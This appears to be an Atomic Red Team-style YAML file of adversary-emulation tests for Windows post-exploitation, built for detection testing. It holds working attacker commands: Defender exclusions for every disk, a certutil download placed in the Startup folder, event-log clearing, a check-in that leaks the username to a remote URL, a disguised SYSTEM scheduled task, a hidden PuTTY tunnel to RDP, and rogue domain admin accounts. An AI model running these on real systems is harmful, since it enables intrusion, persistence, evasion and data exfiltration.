Atomic Tests for Slash And Grab Post Exploitation - Some new, some old. Contribute to Atomic here https://github.com/redcanaryco/atomic-red-team/pulls
attack_technique: Many | |
display_name: Slash and Grab Post-Ex | |
atomic_tests: | |
- name: Add all logical disks to Windows Defender exclusion list | |
description: | | |
This test adds every logical disk on the system to the Windows Defender exclusion list. It defines no cleanup_command, so the exclusions remain in place after the test runs. | |
supported_platforms: | |
- windows | |
executor: | |
command: | | |
foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid} | |
name: powershell | |
elevation_required: true | |
- name: certutil download (urlcache) | |
description: | | |
Use the certutil -urlcache argument to download a file from the web, then move it into the all-users Startup folder. | |
supported_platforms: | |
- windows | |
input_arguments: | |
remote_file: | |
description: URL of file to copy | |
type: url | |
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi | |
local_path: | |
description: Local path to place file | |
type: path | |
default: c:\mpyutild.msi | |
executor: | |
command: | | |
cmd /c certutil -urlcache -f #{remote_file} #{local_path} | |
move #{local_path} "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" | |
cleanup_command: | | |
del #{local_path} >nul 2>&1 | |
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\#{local_path}" >nul 2>&1 | |
name: command_prompt | |
- name: Clear Logs | |
description: | | |
Upon execution this test will clear the specified Windows Event Log (default: System). Open the System.evtx log at C:\Windows\System32\winevt\Logs and verify that it is now empty. | |
supported_platforms: | |
- windows | |
input_arguments: | |
log_name: | |
description: Windows Event Log name, e.g. System | |
type: string | |
default: System | |
executor: | |
command: | | |
wevtutil cl #{log_name} | |
name: command_prompt | |
elevation_required: true | |
- name: UserName Checkin | |
description: | | |
This test checks in with a remote server using PowerShell; the default URL embeds the current user name in the request. | |
supported_platforms: | |
- windows | |
input_arguments: | |
url: | |
description: URL to check in with | |
type: url | |
default: https://9d06e4f428c94e3295277e2784036c61.api.mockbin.io/MyUserName_$env:UserName | |
executor: | |
command: | | |
powershell -c "Invoke-WebRequest -Uri #{url}" | |
name: command_prompt | |
elevation_required: false | |
- name: Create Scheduled Task | |
description: | | |
This test creates a scheduled task with the SCHTASKS command that runs as SYSTEM at system startup. | |
supported_platforms: | |
- windows | |
input_arguments: | |
task_name: | |
description: Name of the task | |
type: string | |
default: "\\Microsoft\\Windows\\Wininet\\UserCache_1708535250863" | |
task_run: | |
description: Task to be run | |
type: string | |
default: "C:\\Windows\\Help\\Help\\SentinelUI.exe" | |
executor: | |
command: | | |
SCHTASKS /Create /TN "#{task_name}" /TR "#{task_run}" /RU SYSTEM /SC ONSTART /RL HIGHEST /F /DELAY 0000:05 | |
cleanup_command: | | |
SCHTASKS /Delete /TN "#{task_name}" /F | |
name: command_prompt | |
elevation_required: true | |
- name: Download PuTTY and setup SSH tunnel | |
description: | | |
This test downloads PuTTY from a URL and launches it with a hidden window to set up an SSH tunnel to the given host. | |
supported_platforms: | |
- windows | |
input_arguments: | |
host: | |
description: SSH host | |
type: string | |
default: example.com | |
executor: | |
command: | | |
powershell -c "Invoke-WebRequest -Uri https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe -OutFile C:\putty\putty.exe" | |
powershell -c "$r = 'C:\putty\'; $e = $r + 'putty.exe'; $g = '#{host}'; $args = @('tunnel@' + $g, '-P 443', '-N', '-ssh', '-L 9595:localhost:3389'); (Start-Process -FilePath $e -ArgumentList $args -PassThru -WindowStyle Hidden).Id" | |
cleanup_command: | | |
powershell -c "Stop-Process -Name putty -Force" | |
powershell -c "Remove-Item -Path C:\putty\putty.exe -Force" | |
name: powershell | |
elevation_required: false | |
- name: Download and Install Chrome Remote Desktop Host | |
description: | | |
This test downloads Chrome Remote Desktop Host from a URL and installs it. | |
supported_platforms: | |
- windows | |
executor: | |
command: | | |
$path = Join-Path -Path $env:ProgramData -ChildPath '1.msi' | |
(New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $path) | |
Start-Process 'msiexec.exe' -ArgumentList "/i `"$path`"" -Wait | |
cleanup_command: | | |
Remove-Item -Path $env:ProgramData\1.msi -Force | |
name: powershell | |
elevation_required: true | |
- name: Add Users and Assign Groups | |
description: | | |
This test adds several domain users (and one local user) and assigns them to various privileged groups. | |
supported_platforms: | |
- windows | |
executor: | |
command: | | |
net user /add default test@2021! /domain | |
net group "Domain Admins" default /add /domain | |
net group "Enterprise Admins" default /add /domain | |
net group "Remote Desktop Users" default /add /domain | |
net group "Group Policy Creator Owners" default /add /domain | |
net group "Schema Admins" default /add /domain | |
net user default /active:yes /domain | |
net user /add default1 test@2021! /domain | |
net user /add default1 test@2021! /domain | |
net user /add oldadmin Pass8080!! | |
net localgroup administrators oldadmin /add | |
net user temp 123123qwE /add /domain | |
net group "Domain Admins" temp /add /domain | |
name: command_prompt | |
elevation_required: true | |
cleanup_command: | | |
net user default /delete /domain | |
net group "Domain Admins" default /delete /domain | |
net group "Enterprise Admins" default /delete /domain | |
net group "Remote Desktop Users" default /delete /domain | |
net group "Group Policy Creator Owners" default /delete /domain | |
net group "Schema Admins" default /delete /domain | |
net user default1 /delete /domain | |
net user oldadmin /delete | |
net localgroup administrators oldadmin /delete | |
net user temp /delete /domain | |
net group "Domain Admins" temp /delete /domain |